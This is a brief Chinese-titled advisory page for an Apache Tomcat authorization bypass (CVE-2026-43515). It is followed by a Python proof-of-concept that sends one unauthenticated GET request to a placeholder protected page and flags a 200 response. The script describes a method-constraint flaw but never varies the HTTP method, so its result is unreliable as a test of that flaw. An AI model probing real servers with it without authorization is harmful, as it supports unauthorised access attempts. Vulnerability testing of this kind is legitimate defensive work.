CVE-2026-43515 Apache Tomcat 权限绕过漏洞

import requests # PoC for CVE-2026-43515 # Description: This script checks if a protected resource can be accessed # due to the improper authorization handling with multiple method constraints. target_url = "http://target-vulnerable-tomcat.com/protected/resource.jsp" headers = { "User-Agent": "CVE-2026-43515-Test" } print(f"[*] Attempting to access: {target_url}") try: # Send a request without authentication cookies response = requests.get(target_url, headers=headers, timeout=10) if response.status_code == 200: print("[+] Potential Vulnerability Detected!") print("[+] Received 200 OK without authentication.") print(f"[+] Response Content Length: {len(response.text)}") elif response.status_code == 401 or response.status_code == 403: print("[-] Access Denied. System might be patched or not vulnerable.") else: print(f"[?] Received status code: {response.status_code}") except Exception as e: print(f"[!] Error during request: {e}")